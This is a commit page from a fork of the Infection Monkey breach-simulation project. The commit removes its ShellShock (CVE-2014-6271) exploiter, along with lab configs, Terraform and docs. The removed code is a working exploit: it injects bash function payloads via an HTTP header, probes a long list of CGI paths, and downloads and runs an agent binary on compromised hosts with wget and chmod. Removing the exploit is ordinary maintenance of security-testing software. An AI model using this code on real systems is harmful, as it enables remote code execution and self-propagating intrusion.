p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Merge pull request #1735 from guardicore/1733-remove-shellshock-exploit 

Remove shellshock exploit
This commit is contained in:
Mike Salvatore 2022-02-23 10:27:22 -05:00 committed by GitHub
parent cdd28dda7b 55c3236d8e
commit 57e6d0208d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
26 changed files with 3 additions and 859 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
CHANGELOG.md
View File

@ -45,6 +45,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
- MS08-067 (Conficker) exploiter. #1677
- Agent bootloader. #1676
- Zero Trust integration with ScoutSuite. #1669
- ShellShock exploiter. #1733
### Fixed
- A bug in network map page that caused delay of telemetry log loading. #1545

2
README.md
View File

@ -46,7 +46,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
* SSH
* SMB
* WMI
* Shellshock
* Log4Shell
* Elastic Search (CVE-2015-1427)
* Weblogic server
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.

2
docs/content/development/_index.md
View File

@ -26,7 +26,7 @@ You can take a look at [our roadmap](https://github.com/guardicore/monkey/projec
The best way to find weak spots in a network is by attacking it. The [*Adding Exploits*](./adding-exploits/) page will help you add exploits.
It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Shellshock.
It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Hadoop.
### Analysis plugins 🔬

11
docs/content/reference/exploiters/shellshock.md
View File

@ -1,11 +0,0 @@
---
title: "ShellShock"
date: 2020-07-14T08:41:32+03:00
draft: false
tags: ["exploit", "linux"]
---
### Description
This exploit, CVE-2014-6271, is based on the [logic in NCC group's GitHub](https://github.com/nccgroup/shocker/blob/master/shocker.py).
> In GNU Bash (through 4.3), processes trailing strings after function definitions in the values of environment variables allow remote attackers to execute arbitrary code via a crafted environment. This is demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution, AKA "ShellShock."

1
envs/monkey_zoo/blackbox/config_templates/performance.py
View File

@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",

17
envs/monkey_zoo/blackbox/config_templates/shellshock.py
View File

@ -1,17 +0,0 @@
from copy import copy
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
class ShellShock(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.8"],
"internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
"internal.network.tcp_scanner.tcp_target_ports": [],
}
)

1
envs/monkey_zoo/blackbox/gcp_test_machine_list.py
View File

@ -17,7 +17,6 @@ GCP_TEST_MACHINE_LIST = {
"tunneling-12",
"weblogic-18",
"weblogic-19",
"shellshock-8",
"zerologon-25",
"drupal-28",
],

4
envs/monkey_zoo/blackbox/test_blackbox.py
View File

@ -20,7 +20,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse import (
PowerShellCredentialsReuse,
)
from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
@ -200,9 +199,6 @@ class TestMonkeyBlackbox:
def test_weblogic_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellshock_exploiter")
def test_log4j_solr_exploiter(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(
island_client, Log4jSolr, "Log4Shell_Solr_exploiter"

2
envs/monkey_zoo/blackbox/utils/config_generation_script.py
View File

@ -12,7 +12,6 @@ from envs.monkey_zoo.blackbox.config_templates.log4j_tomcat import Log4jTomcat
from envs.monkey_zoo.blackbox.config_templates.mssql import Mssql
from envs.monkey_zoo.blackbox.config_templates.performance import Performance
from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
Mssql,
Performance,
PowerShell,
ShellShock,
SmbMimikatz,
SmbPth,
Ssh,

33
envs/monkey_zoo/docs/fullDocs.md
View File

@ -11,7 +11,6 @@ This document describes Infection Monkeys test network, how to deploy and use
[Nr. 3 Hadoop](#_Toc526517183)<br>
[Nr. 4 Elastic](#_Toc526517184)<br>
[Nr. 5 Elastic](#_Toc526517185)<br>
[Nr. 8 Shellshock](#_Toc536021461)<br>
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
[Nr. 11 SSH key steal](#_Toc526517190)<br>
@ -326,38 +325,6 @@ Update all requirements using deployment script:<br>
</tbody>
</table>
<table>
<thead>
<tr class="header">
<th><p><span id="_Toc536021461" class="anchor"></span>Nr. <strong>8</strong> Shellshock</p>
<p>(10.2.2.8)</p></th>
<th>(Vulnerable)</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>OS:</td>
<td><strong>Ubuntu 12.04 LTS x64</strong></td>
</tr>
<tr class="even">
<td>Software:</td>
<td>Apache2, bash 4.2.</td>
</tr>
<tr class="odd">
<td>Default servers port:</td>
<td>80</td>
</tr>
<tr class="even">
<td>Scan results:</td>
<td>Machine exploited using Shellshock exploiter</td>
</tr>
<tr class="odd">
<td>Notes:</td>
<td>Vulnerable app is under /cgi-bin/test.cgi</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr class="header">

5
envs/monkey_zoo/terraform/images.tf
View File

@ -15,11 +15,6 @@ data "google_compute_image" "elastic-5" {
name = "elastic-5"
project = local.monkeyzoo_project
}
data "google_compute_image" "shellshock-8" {
name = "shellshock-8"
project = local.monkeyzoo_project
}
data "google_compute_image" "tunneling-9" {
name = "tunneling-9"
project = local.monkeyzoo_project

15
envs/monkey_zoo/terraform/monkey_zoo.tf
View File

@ -106,21 +106,6 @@ resource "google_compute_instance_from_template" "elastic-5" {
}
}
resource "google_compute_instance_from_template" "shellshock-8" {
name = "${local.resource_prefix}shellshock-8"
source_instance_template = local.default_ubuntu
boot_disk{
initialize_params {
image = data.google_compute_image.shellshock-8.self_link
}
auto_delete = true
}
network_interface {
subnetwork="${local.resource_prefix}monkeyzoo-main"
network_ip="10.2.2.8"
}
}
resource "google_compute_instance_from_template" "tunneling-9" {
name = "${local.resource_prefix}tunneling-9"
source_instance_template = local.default_ubuntu

1
monkey/infection_monkey/example.conf
View File

@ -27,7 +27,6 @@
"SSHExploiter",
"SmbExploiter",
"WmiExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",

269
monkey/infection_monkey/exploit/shellshock.py
View File

@ -1,269 +0,0 @@
# Implementation is based on shellshock script provided
# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
from random import SystemRandom
import requests
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.shellshock_resources import CGI_FILES
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.model import DROPPER_ARG
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
from infection_monkey.utils.commands import build_monkey_commandline
logger = logging.getLogger(__name__)
TIMEOUT = 2
TEST_COMMAND = "/bin/uname -a"
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type": "() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
def __init__(self, host):
super(ShellShockExploiter, self).__init__(host)
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
safe_random = SystemRandom()
self.success_flag = "".join(
safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
)
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
}
valid_ports = [
(port, candidate_services["tcp-" + str(port)]["data"][1])
for port in self.HTTP
if "tcp-" + str(port) in candidate_services
]
http_ports = [port[0] for port in valid_ports if not port[1]]
https_ports = [port[0] for port in valid_ports if port[1]]
logger.info(
"Scanning %s, ports [%s] for vulnerable CGI pages"
% (self.host, ",".join([str(port[0]) for port in valid_ports]))
)
attackable_urls = []
# now for each port we want to check the entire URL list
for port in http_ports:
urls = self.check_urls(self.host.ip_addr, port)
attackable_urls.extend(urls)
for port in https_ports:
urls = self.check_urls(self.host.ip_addr, port, is_https=True)
attackable_urls.extend(urls)
# now for each URl we want to try and see if it's attackable
exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
# we want to report all vulnerable URLs even if we didn't succeed
self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
# now try URLs until we install something on victim
for _, url, header, exploit in exploitable_urls:
logger.info("Trying to attack host %s with %s URL" % (self.host, url))
# same attack script as sshexec
# for any failure, quit and don't try other URLs
if not self.host.os.get("type"):
try:
uname_os_attack = exploit + "/bin/uname -o"
uname_os = self.attack_page(url, header, uname_os_attack)
if "linux" in uname_os:
self.host.os["type"] = "linux"
else:
logger.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception as exc:
logger.debug(
"Error running uname os command on victim %r: (%s)", self.host, exc
)
return False
if not self.host.os.get("machine"):
try:
uname_machine_attack = exploit + "/bin/uname -m"
uname_machine = self.attack_page(url, header, uname_machine_attack)
if "" != uname_machine:
self.host.os["machine"] = uname_machine.lower().strip()
except Exception as exc:
logger.debug(
"Error running uname machine command on victim %r: (%s)", self.host, exc
)
return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
if not self._create_lock_file(exploit, url, header):
logger.info("Another monkey is running shellshock exploit")
return True
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False
download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
download = exploit + download_command
self.attack_page(
url, header, download
) # we ignore failures here since it might take more than TIMEOUT time
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
self._remove_lock_file(exploit, url, header)
if (http_thread.downloads != 1) or (
"ELF"
not in self.check_remote_file_exists(
url, header, exploit, dropper_target_path_linux
)
):
logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue
# turn the monkey into an executable
chmod = "/bin/chmod +x %s" % dropper_target_path_linux
run_path = exploit + chmod
self.attack_page(url, header, run_path)
T1222Telem(ScanStatus.USED, chmod, self.host).send()
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
dropper_target_path_linux,
)
cmdline += " & "
run_path = exploit + cmdline
self.attack_page(url, header, run_path)
logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
cmdline,
)
if not (
self.check_remote_file_exists(
url, header, exploit, self._config.monkey_log_path_linux
)
):
logger.info("Log file does not exist, monkey might not have run")
continue
self.add_executed_cmd(cmdline)
return True
return False
@classmethod
def check_remote_file_exists(cls, url, header, exploit, file_path):
"""
Checks if a remote file exists and returns the content if so
file_path should be fully qualified
"""
cmdline = "/usr/bin/head -c 4 %s" % file_path
run_path = exploit + cmdline
resp = cls.attack_page(url, header, run_path)
if resp:
logger.info("File %s exists on remote host" % file_path)
return resp
def attempt_exploit(self, url, attacks=None):
# Flag used to identify whether the exploit has successfully caused the
# server to return a useful response
if not attacks:
attacks = self._attacks
logger.debug("Attack Flag is: %s" % self.success_flag)
logger.debug("Trying exploit for %s" % url)
for header, exploit in list(attacks.items()):
attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
result = self.attack_page(url, header, attack)
if self.success_flag in result:
logger.info("URL %s looks vulnerable" % url)
return True, url, header, exploit
else:
logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return (False,)
def _create_lock_file(self, exploit, url, header):
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
return False
cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
return True
def _remove_lock_file(self, exploit, url, header):
cmd = exploit + "rm %s" % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
@staticmethod
def attack_page(url, header, attack):
result = ""
try:
logger.debug("Header is: %s" % header)
logger.debug("Attack is: %s" % attack)
r = requests.get( # noqa: DUO123
url, headers={header: attack}, verify=False, timeout=TIMEOUT
)
result = r.content.decode()
return result
except requests.exceptions.RequestException as exc:
logger.debug("Failed to run, exception %s" % exc)
return result
@staticmethod
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
"""
Checks if which urls exist
:return: Sequence of URLs to try and attack
"""
attack_path = "http://"
if is_https:
attack_path = "https://"
attack_path = attack_path + str(host) + ":" + str(port)
reqs = []
timeout = False
attack_urls = [attack_path + url for url in url_list]
for u in attack_urls:
try:
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
except requests.Timeout:
timeout = True
break
if timeout:
logger.debug(
"Some connections timed out while sending request to potentially vulnerable "
"urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]
return urls

408
monkey/infection_monkey/exploit/shellshock_resources.py
View File

@ -1,408 +0,0 @@
# resource for shellshock attack
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
CGI_FILES = (
r"/",
r"/admin.cgi",
r"/administrator.cgi",
r"/agora.cgi",
r"/aktivate/cgi-bin/catgy.cgi",
r"/analyse.cgi",
r"/apps/web/vs_diag.cgi",
r"/axis-cgi/buffer/command.cgi",
r"/b2-include/b2edit.showposts.php",
r"/bandwidth/index.cgi",
r"/bigconf.cgi",
r"/cartcart.cgi",
r"/cart.cgi",
r"/ccbill/whereami.cgi",
r"/cgi-bin/14all-1.1.cgi",
r"/cgi-bin/14all.cgi",
r"/cgi-bin/a1disp3.cgi",
r"/cgi-bin/a1stats/a1disp3.cgi",
r"/cgi-bin/a1stats/a1disp4.cgi",
r"/cgi-bin/addbanner.cgi",
r"/cgi-bin/add_ftp.cgi",
r"/cgi-bin/adduser.cgi",
r"/cgi-bin/admin/admin.cgi",
r"/cgi-bin/admin.cgi",
r"/cgi-bin/admin/getparam.cgi",
r"/cgi-bin/adminhot.cgi",
r"/cgi-bin/admin.pl",
r"/cgi-bin/admin/setup.cgi",
r"/cgi-bin/adminwww.cgi",
r"/cgi-bin/af.cgi",
r"/cgi-bin/aglimpse.cgi",
r"/cgi-bin/alienform.cgi",
r"/cgi-bin/AnyBoard.cgi",
r"/cgi-bin/architext_query.cgi",
r"/cgi-bin/astrocam.cgi",
r"/cgi-bin/AT-admin.cgi",
r"/cgi-bin/AT-generate.cgi",
r"/cgi-bin/auction/auction.cgi",
r"/cgi-bin/auktion.cgi",
r"/cgi-bin/ax-admin.cgi",
r"/cgi-bin/ax.cgi",
r"/cgi-bin/axs.cgi",
r"/cgi-bin/badmin.cgi",
r"/cgi-bin/banner.cgi",
r"/cgi-bin/bannereditor.cgi",
r"/cgi-bin/bb-ack.sh",
r"/cgi-bin/bb-histlog.sh",
r"/cgi-bin/bb-hist.sh",
r"/cgi-bin/bb-hostsvc.sh",
r"/cgi-bin/bb-replog.sh",
r"/cgi-bin/bb-rep.sh",
r"/cgi-bin/bbs_forum.cgi",
r"/cgi-bin/bigconf.cgi",
r"/cgi-bin/bizdb1-search.cgi",
r"/cgi-bin/blog/mt-check.cgi",
r"/cgi-bin/blog/mt-load.cgi",
r"/cgi-bin/bnbform.cgi",
r"/cgi-bin/book.cgi",
r"/cgi-bin/boozt/admin/index.cgi",
r"/cgi-bin/bsguest.cgi",
r"/cgi-bin/bslist.cgi",
r"/cgi-bin/build.cgi",
r"/cgi-bin/bulk/bulk.cgi",
r"/cgi-bin/cached_feed.cgi",
r"/cgi-bin/cachemgr.cgi",
r"/cgi-bin/calendar/index.cgi",
r"/cgi-bin/cartmanager.cgi",
r"/cgi-bin/cbmc/forums.cgi",
r"/cgi-bin/ccvsblame.cgi",
r"/cgi-bin/c_download.cgi",
r"/cgi-bin/cgforum.cgi",
r"/cgi-bin/.cgi",
r"/cgi-bin/cgi_process",
r"/cgi-bin/classified.cgi",
r"/cgi-bin/classifieds.cgi",
r"/cgi-bin/classifieds/classifieds.cgi",
r"/cgi-bin/classifieds/index.cgi",
r"/cgi-bin/.cobalt/alert/service.cgi",
r"/cgi-bin/.cobalt/message/message.cgi",
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
r"/cgi-bin/commandit.cgi",
r"/cgi-bin/commerce.cgi",
r"/cgi-bin/common/listrec.pl",
r"/cgi-bin/compatible.cgi",
r"/cgi-bin/Count.cgi",
r"/cgi-bin/csChatRBox.cgi",
r"/cgi-bin/csGuestBook.cgi",
r"/cgi-bin/csLiveSupport.cgi",
r"/cgi-bin/CSMailto.cgi",
r"/cgi-bin/CSMailto/CSMailto.cgi",
r"/cgi-bin/csNews.cgi",
r"/cgi-bin/csNewsPro.cgi",
r"/cgi-bin/csPassword.cgi",
r"/cgi-bin/csPassword/csPassword.cgi",
r"/cgi-bin/csSearch.cgi",
r"/cgi-bin/csv_db.cgi",
r"/cgi-bin/cvsblame.cgi",
r"/cgi-bin/cvslog.cgi",
r"/cgi-bin/cvsquery.cgi",
r"/cgi-bin/cvsqueryform.cgi",
r"/cgi-bin/day5datacopier.cgi",
r"/cgi-bin/day5datanotifier.cgi",
r"/cgi-bin/db_manager.cgi",
r"/cgi-bin/dbman/db.cgi",
r"/cgi-bin/dcforum.cgi",
r"/cgi-bin/dcshop.cgi",
r"/cgi-bin/dfire.cgi",
r"/cgi-bin/diagnose.cgi",
r"/cgi-bin/dig.cgi",
r"/cgi-bin/directorypro.cgi",
r"/cgi-bin/download.cgi",
r"/cgi-bin/e87_Ba79yo87.cgi",
r"/cgi-bin/emu/html/emumail.cgi",
r"/cgi-bin/emumail.cgi",
r"/cgi-bin/emumail/emumail.cgi",
r"/cgi-bin/enter.cgi",
r"/cgi-bin/environ.cgi",
r"/cgi-bin/ezadmin.cgi",
r"/cgi-bin/ezboard.cgi",
r"/cgi-bin/ezman.cgi",
r"/cgi-bin/ezshopper2/loadpage.cgi",
r"/cgi-bin/ezshopper3/loadpage.cgi",
r"/cgi-bin/ezshopper/loadpage.cgi",
r"/cgi-bin/ezshopper/search.cgi",
r"/cgi-bin/faqmanager.cgi",
r"/cgi-bin/FileSeek2.cgi",
r"/cgi-bin/FileSeek.cgi",
r"/cgi-bin/finger.cgi",
r"/cgi-bin/flexform.cgi",
r"/cgi-bin/fom.cgi",
r"/cgi-bin/fom/fom.cgi",
r"/cgi-bin/FormHandler.cgi",
r"/cgi-bin/FormMail.cgi",
r"/cgi-bin/gbadmin.cgi",
r"/cgi-bin/gbook/gbook.cgi",
r"/cgi-bin/generate.cgi",
r"/cgi-bin/getdoc.cgi",
r"/cgi-bin/gH.cgi",
r"/cgi-bin/gm-authors.cgi",
r"/cgi-bin/gm.cgi",
r"/cgi-bin/gm-cplog.cgi",
r"/cgi-bin/guestbook.cgi",
r"/cgi-bin/handler",
r"/cgi-bin/handler.cgi",
r"/cgi-bin/handler/netsonar",
r"/cgi-bin/hitview.cgi",
r"/cgi-bin/hsx.cgi",
r"/cgi-bin/html2chtml.cgi",
r"/cgi-bin/html2wml.cgi",
r"/cgi-bin/htsearch.cgi",
r"/cgi-bin/hw.sh", # testing
r"/cgi-bin/icat",
r"/cgi-bin/if/admin/nph-build.cgi",
r"/cgi-bin/ikonboard/help.cgi",
r"/cgi-bin/ImageFolio/admin/admin.cgi",
r"/cgi-bin/imageFolio.cgi",
r"/cgi-bin/index.cgi",
r"/cgi-bin/infosrch.cgi",
r"/cgi-bin/jammail.pl",
r"/cgi-bin/journal.cgi",
r"/cgi-bin/lastlines.cgi",
r"/cgi-bin/loadpage.cgi",
r"/cgi-bin/login.cgi",
r"/cgi-bin/logit.cgi",
r"/cgi-bin/log-reader.cgi",
r"/cgi-bin/lookwho.cgi",
r"/cgi-bin/lwgate.cgi",
r"/cgi-bin/MachineInfo",
r"/cgi-bin/MachineInfo",
r"/cgi-bin/magiccard.cgi",
r"/cgi-bin/mail/emumail.cgi",
r"/cgi-bin/maillist.cgi",
r"/cgi-bin/mailnews.cgi",
r"/cgi-bin/mail/nph-mr.cgi",
r"/cgi-bin/main.cgi",
r"/cgi-bin/main_menu.pl",
r"/cgi-bin/man.sh",
r"/cgi-bin/mini_logger.cgi",
r"/cgi-bin/mmstdod.cgi",
r"/cgi-bin/moin.cgi",
r"/cgi-bin/mojo/mojo.cgi",
r"/cgi-bin/mrtg.cgi",
r"/cgi-bin/mt.cgi",
r"/cgi-bin/mt/mt.cgi",
r"/cgi-bin/mt/mt-check.cgi",
r"/cgi-bin/mt/mt-load.cgi",
r"/cgi-bin/mt-static/mt-check.cgi",
r"/cgi-bin/mt-static/mt-load.cgi",
r"/cgi-bin/musicqueue.cgi",
r"/cgi-bin/myguestbook.cgi",
r"/cgi-bin/.namazu.cgi",
r"/cgi-bin/nbmember.cgi",
r"/cgi-bin/netauth.cgi",
r"/cgi-bin/netpad.cgi",
r"/cgi-bin/newsdesk.cgi",
r"/cgi-bin/nlog-smb.cgi",
r"/cgi-bin/nph-emumail.cgi",
r"/cgi-bin/nph-exploitscanget.cgi",
r"/cgi-bin/nph-publish.cgi",
r"/cgi-bin/nph-test.cgi",
r"/cgi-bin/pagelog.cgi",
r"/cgi-bin/pbcgi.cgi",
r"/cgi-bin/perlshop.cgi",
r"/cgi-bin/pfdispaly.cgi",
r"/cgi-bin/pfdisplay.cgi",
r"/cgi-bin/phf.cgi",
r"/cgi-bin/photo/manage.cgi",
r"/cgi-bin/photo/protected/manage.cgi",
r"/cgi-bin/php-cgi",
r"/cgi-bin/php.cgi",
r"/cgi-bin/php.fcgi",
r"/cgi-bin/ping.sh",
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
r"/cgi-bin/pollssi.cgi",
r"/cgi-bin/postcards.cgi",
r"/cgi-bin/powerup/r.cgi",
r"/cgi-bin/printenv",
r"/cgi-bin/probecontrol.cgi",
r"/cgi-bin/profile.cgi",
r"/cgi-bin/publisher/search.cgi",
r"/cgi-bin/quickstore.cgi",
r"/cgi-bin/quizme.cgi",
r"/cgi-bin/ratlog.cgi",
r"/cgi-bin/r.cgi",
r"/cgi-bin/register.cgi",
r"/cgi-bin/replicator/webpage.cgi/",
r"/cgi-bin/responder.cgi",
r"/cgi-bin/robadmin.cgi",
r"/cgi-bin/robpoll.cgi",
r"/cgi-bin/rtpd.cgi",
r"/cgi-bin/sbcgi/sitebuilder.cgi",
r"/cgi-bin/scoadminreg.cgi",
r"/cgi-bin-sdb/printenv",
r"/cgi-bin/sdbsearch.cgi",
r"/cgi-bin/search",
r"/cgi-bin/search.cgi",
r"/cgi-bin/search/search.cgi",
r"/cgi-bin/sendform.cgi",
r"/cgi-bin/shop.cgi",
r"/cgi-bin/shopper.cgi",
r"/cgi-bin/shopplus.cgi",
r"/cgi-bin/showcheckins.cgi",
r"/cgi-bin/simplestguest.cgi",
r"/cgi-bin/simplestmail.cgi",
r"/cgi-bin/smartsearch.cgi",
r"/cgi-bin/smartsearch/smartsearch.cgi",
r"/cgi-bin/snorkerz.bat",
r"/cgi-bin/snorkerz.bat",
r"/cgi-bin/snorkerz.cmd",
r"/cgi-bin/snorkerz.cmd",
r"/cgi-bin/sojourn.cgi",
r"/cgi-bin/spin_client.cgi",
r"/cgi-bin/start.cgi",
r"/cgi-bin/status",
r"/cgi-bin/status_cgi",
r"/cgi-bin/store/agora.cgi",
r"/cgi-bin/store.cgi",
r"/cgi-bin/store/index.cgi",
r"/cgi-bin/survey.cgi",
r"/cgi-bin/sync.cgi",
r"/cgi-bin/talkback.cgi",
r"/cgi-bin/technote/main.cgi",
r"/cgi-bin/test2.pl",
r"/cgi-bin/test-cgi",
r"/cgi-bin/test.cgi",
r"/cgi-bin/testing_whatever",
r"/cgi-bin/test/test.cgi",
r"/cgi-bin/tidfinder.cgi",
r"/cgi-bin/tigvote.cgi",
r"/cgi-bin/title.cgi",
r"/cgi-bin/top.cgi",
r"/cgi-bin/traffic.cgi",
r"/cgi-bin/troops.cgi",
r"/cgi-bin/ttawebtop.cgi/",
r"/cgi-bin/ultraboard.cgi",
r"/cgi-bin/upload.cgi",
r"/cgi-bin/urlcount.cgi",
r"/cgi-bin/viewcvs.cgi",
r"/cgi-bin/view_help.cgi",
r"/cgi-bin/viralator.cgi",
r"/cgi-bin/virgil.cgi",
r"/cgi-bin/vote.cgi",
r"/cgi-bin/vpasswd.cgi",
r"/cgi-bin/way-board.cgi",
r"/cgi-bin/way-board/way-board.cgi",
r"/cgi-bin/webbbs.cgi",
r"/cgi-bin/webcart/webcart.cgi",
r"/cgi-bin/webdist.cgi",
r"/cgi-bin/webif.cgi",
r"/cgi-bin/webmail/html/emumail.cgi",
r"/cgi-bin/webmap.cgi",
r"/cgi-bin/webspirs.cgi",
r"/cgi-bin/Web_Store/web_store.cgi",
r"/cgi-bin/whois.cgi",
r"/cgi-bin/whois_raw.cgi",
r"/cgi-bin/whois/whois.cgi",
r"/cgi-bin/wrap",
r"/cgi-bin/wrap.cgi",
r"/cgi-bin/wwwboard.cgi.cgi",
r"/cgi-bin/YaBB/YaBB.cgi",
r"/cgi-bin/zml.cgi",
r"/cgi-mod/index.cgi",
r"/cgis/wwwboard/wwwboard.cgi",
r"/cgi-sys/addalink.cgi",
r"/cgi-sys/defaultwebpage.cgi",
r"/cgi-sys/domainredirect.cgi",
r"/cgi-sys/entropybanner.cgi",
r"/cgi-sys/entropysearch.cgi",
r"/cgi-sys/FormMail-clone.cgi",
r"/cgi-sys/helpdesk.cgi",
r"/cgi-sys/mchat.cgi",
r"/cgi-sys/randhtml.cgi",
r"/cgi-sys/realhelpdesk.cgi",
r"/cgi-sys/realsignup.cgi",
r"/cgi-sys/signup.cgi",
r"/connector.cgi",
r"/cp/rac/nsManager.cgi",
r"/create_release.sh",
r"/CSNews.cgi",
r"/csPassword.cgi",
r"/dcadmin.cgi",
r"/dcboard.cgi",
r"/dcforum.cgi",
r"/dcforum/dcforum.cgi",
r"/debuff.cgi",
r"/debug.cgi",
r"/details.cgi",
r"/edittag/edittag.cgi",
r"/emumail.cgi",
r"/enter_buff.cgi",
r"/enter_bug.cgi",
r"/ez2000/ezadmin.cgi",
r"/ez2000/ezboard.cgi",
r"/ez2000/ezman.cgi",
r"/fcgi-bin/echo",
r"/fcgi-bin/echo",
r"/fcgi-bin/echo2",
r"/fcgi-bin/echo2",
r"/Gozila.cgi",
r"/hitmatic/analyse.cgi",
r"/hp_docs/cgi-bin/index.cgi",
r"/html/cgi-bin/cgicso",
r"/html/cgi-bin/cgicso",
r"/index.cgi",
r"/info.cgi",
r"/infosrch.cgi",
r"/login.cgi",
r"/mailview.cgi",
r"/main.cgi",
r"/megabook/admin.cgi",
r"/ministats/admin.cgi",
r"/mods/apage/apage.cgi",
r"/_mt/mt.cgi",
r"/musicqueue.cgi",
r"/ncbook.cgi",
r"/newpro.cgi",
r"/newsletter.sh",
r"/oem_webstage/cgi-bin/oemapp_cgi",
r"/page.cgi",
r"/parse_xml.cgi",
r"/photodata/manage.cgi",
r"/photo/manage.cgi",
r"/print.cgi",
r"/process_buff.cgi",
r"/process_bug.cgi",
r"/pub/english.cgi",
r"/quikmail/nph-emumail.cgi",
r"/quikstore.cgi",
r"/reviews/newpro.cgi",
r"/ROADS/cgi-bin/search.pl",
r"/sample01.cgi",
r"/sample02.cgi",
r"/sample03.cgi",
r"/sample04.cgi",
r"/sampleposteddata.cgi",
r"/scancfg.cgi",
r"/scancfg.cgi",
r"/servers/link.cgi",
r"/setpasswd.cgi",
r"/SetSecurity.shm",
r"/shop/member_html.cgi",
r"/shop/normal_html.cgi",
r"/site_searcher.cgi",
r"/siteUserMod.cgi",
r"/submit.cgi",
r"/technote/print.cgi",
r"/template.cgi",
r"/test.cgi",
r"/ucsm/isSamInstalled.cgi",
r"/upload.cgi",
r"/userreg.cgi",
r"/users/scripts/submit.cgi",
r"/vood/cgi-bin/vood_view.cgi",
r"/Web_Store/web_store.cgi",
